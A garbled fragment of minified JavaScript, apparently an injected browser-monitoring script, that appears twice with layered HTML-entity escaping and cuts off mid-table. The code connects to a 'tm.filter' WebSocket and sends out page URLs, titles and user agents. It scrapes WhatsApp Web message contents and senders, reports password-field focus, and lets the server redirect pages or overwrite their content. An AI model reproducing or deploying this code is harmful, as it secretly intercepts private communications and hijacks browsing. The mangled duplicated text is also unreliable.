]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&amp;amp;&amp;amp;"pm"==o[3].toLowerCase()&amp;amp;&amp;amp;(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&amp;amp;&amp;amp;!(Math.abs(r-i)&amp;gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&amp;amp;&amp;amp;s&amp;amp;&amp;amp;T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&amp;lt;&amp;lt;7)+(Y&amp;lt;&amp;lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&amp;amp;&amp;amp;(a(),y=setInterval(a,S.sendNotificationsInterval),p()&amp;amp;&amp;amp;(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&amp;lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&amp;amp;&amp;amp;"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&amp;amp;&amp;amp;(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&amp;amp;&amp;amp;(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&amp;amp;&amp;amp;Y.forEach((function(Y){Y&amp;amp;&amp;amp;Y.addedNodes&amp;amp;&amp;amp;0!=Y.addedNodes.length&amp;amp;&amp;amp;(window.NodeList&amp;amp;&amp;amp;!NodeList.prototype.forEach&amp;amp;&amp;amp;(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&amp;amp;&amp;amp;c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&amp;amp;&amp;amp;(this.extJs.webSockReady=()=&amp;gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&amp;gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&amp;lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&amp;amp;&amp;amp;document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&amp;amp;&amp;amp;"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&amp;lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&amp;lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&amp;lt;i;a++)t=Y[a],!e.indexOf(t)&amp;amp;&amp;amp;t.length&amp;gt;r&amp;amp;&amp;amp;(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&amp;gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&amp;amp;&amp;amp;c[a]++,l=g.length}else if(7&amp;gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&amp;amp;&amp;amp;a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&amp;amp;&amp;amp;g?(c.Y+=70&amp;gt;c.Y?2e3:100&amp;gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&amp;gt;c.M||12&amp;lt;c.M||1&amp;gt;c.D||c.D&amp;gt;Y[c.M-1]||23&amp;lt;c.H||59&amp;lt;c.m||59&amp;lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&amp;amp;&amp;amp;Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"8da1fa08-014f-4b94-94f7-ad166211c65d",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"15604",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&amp;amp;&amp;amp;S.extJs.init(S.token),n()&amp;amp;&amp;amp;window.addEventListener("focus",r),(n()||S.extJs)&amp;amp;&amp;amp;l()}))}();&amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD; &#xD; &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&amp;amp;amp;&amp;amp;amp;I.readyState==WebSocket.OPEN&amp;amp;amp;&amp;amp;amp;I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&amp;amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&amp;amp;amp;&amp;amp;amp;(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&amp;amp;amp;&amp;amp;amp;e&amp;amp;amp;&amp;amp;amp;m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&amp;amp;amp;&amp;amp;amp;"password"==Y.type&amp;amp;amp;&amp;amp;amp;!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&amp;amp;amp;&amp;amp;amp;"password"==Y.type&amp;amp;amp;&amp;amp;amp;H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&amp;amp;amp;&amp;amp;amp;e!=document.body?document.querySelector&amp;amp;amp;&amp;amp;amp;(e=document.querySelector(":focus")):e=null;for(var t=0;t&amp;amp;lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&amp;amp;amp;&amp;amp;amp;i.hasAttribute("autofocus"),a=n&amp;amp;amp;&amp;amp;amp;e&amp;amp;amp;&amp;amp;amp;i.isEqualNode(e);(r||a)&amp;amp;amp;&amp;amp;amp;u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&amp;amp;amp;&amp;amp;amp;(S.iup&amp;amp;amp;&amp;amp;amp;r(),p()&amp;amp;amp;&amp;amp;amp;(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&amp;amp;amp;&amp;amp;amp;Y.forEach((function(Y){Y&amp;amp;amp;&amp;amp;amp;("childList"!==Y.type||Y.addedNodes.length&amp;amp;lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&amp;amp;amp;&amp;amp;amp;(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&amp;amp;amp;&amp;amp;amp;(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&amp;amp;amp;&amp;amp;amp;(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&amp;amp;amp;&amp;amp;amp;(t=Array.prototype.slice.call(t)).push(Y),t&amp;amp;amp;&amp;amp;amp;t.forEach((function(Y){if(Y&amp;amp;amp;&amp;amp;amp;Y.classList&amp;amp;amp;&amp;amp;amp;!(Y.classList.length&amp;amp;lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&amp;amp;amp;&amp;amp;amp;t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&amp;amp;amp;&amp;amp;amp;"pm"==o[3].toLowerCase()&amp;amp;amp;&amp;amp;amp;(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&amp;amp;amp;&amp;amp;amp;!(Math.abs(r-i)&amp;amp;gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&amp;amp;amp;&amp;amp;amp;s&amp;amp;amp;&amp;amp;amp;T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&amp;amp;lt;&amp;amp;lt;7)+(Y&amp;amp;lt;&amp;amp;lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&amp;amp;amp;&amp;amp;amp;(a(),y=setInterval(a,S.sendNotificationsInterval),p()&amp;amp;amp;&amp;amp;amp;(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&amp;amp;lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&amp;amp;amp;&amp;amp;amp;"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&amp;amp;amp;&amp;amp;amp;(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&amp;amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&amp;amp;amp;&amp;amp;amp;(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&amp;amp;amp;&amp;amp;amp;Y.forEach((function(Y){Y&amp;amp;amp;&amp;amp;amp;Y.addedNodes&amp;amp;amp;&amp;amp;amp;0!=Y.addedNodes.length&amp;amp;amp;&amp;amp;amp;(window.NodeList&amp;amp;amp;&amp;amp;amp;!NodeList.prototype.forEach&amp;amp;amp;&amp;amp;amp;(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&amp;amp;amp;&amp;amp;amp;c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. 